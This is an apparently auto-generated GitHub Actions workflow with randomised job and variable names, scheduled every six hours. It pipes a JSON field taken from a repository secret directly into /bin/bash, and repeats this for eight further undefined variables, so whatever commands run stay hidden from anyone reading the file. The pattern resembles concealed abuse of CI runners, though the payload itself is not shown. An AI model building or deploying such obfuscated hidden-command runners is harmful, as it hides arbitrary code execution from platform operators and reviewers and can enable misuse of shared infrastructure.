name: duluohan6715
on:
  workflow_dispatch:
  schedule:
    - cron: '20 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: duluohan6715
        env:
          ksu57959: ${{ secrets.ksu57959 }}
        run: |
          echo $ksu57959 | jq -r .ik0 | /bin/bash
          echo $i83963 | jq -r .jszd60118 | /bin/bash
          echo $kvxux90 | jq -r .kghti30569 | /bin/bash
          echo $lr7 | jq -r .kngvl57429 | /bin/bash
          echo $fp0212 | jq -r .npnik329 | /bin/bash
          echo $wetxg98 | jq -r .ihfa5729 | /bin/bash
          echo $f7 | jq -r .necqo156 | /bin/bash
          echo $ks8594 | jq -r .vy1196 | /bin/bash
          echo $v86 | jq -r .jp6 | /bin/bash

